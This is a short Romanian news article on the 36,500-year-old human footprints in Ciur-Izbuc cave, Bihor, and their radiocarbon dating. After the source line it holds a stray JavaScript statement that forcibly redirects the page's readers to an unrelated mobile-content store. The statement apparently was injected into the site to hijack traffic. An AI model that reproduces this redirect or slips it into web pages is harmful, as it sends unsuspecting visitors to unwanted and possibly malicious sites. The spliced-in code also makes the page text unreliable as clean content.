O peșteră din Bihor adăpostește cele mai vechi urme de pași din Europa și poate chiar din lume

Bihor

Cele mai vechi urme de paşi ale omului preistoric din Europa şi poate chiar din lume se află într-o peşteră din judeţul Bihor. Un studiu publicat recent de o echipă de cercetători români şi americani arată că acestea au o vechime de 36.500 de ani.

Străvechile urme de paşi umani au fost găsite în peştera Ciur-Izbuc din Bihor. Descoperirea a fost făcută în 1965, când cercetătorii au identificat peste 400 de urme pe care o familie întreagă de oameni preistorici le-a lăsat în mâlul adus de o inundaţie în peşteră.

Iniţial, specialiştii au presupus că urmele au o vechime de cel mult 15.000 de ani.

În acest an însă, cercetătorii au datat cu carbon radioactiv atât urmele, cât şi câteva oase de urs de peşteră aflate sub amprentele lăsate de oamenii preistorici. Aşa au reuşit să afle că urmele au, de fapt, o vechime de 36.500 de ani şi ar putea fi cele mai vechi din Europa, sau chiar din lume.

Rezultatele studiului au fost publicate într-o cunoscută revistă americană de antropologie. Până la această descoperire, cele mai vechi urme de paşi ale omului preistoric din Europa aveau 33.000 de ani.

Sursa: www.yahoo.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *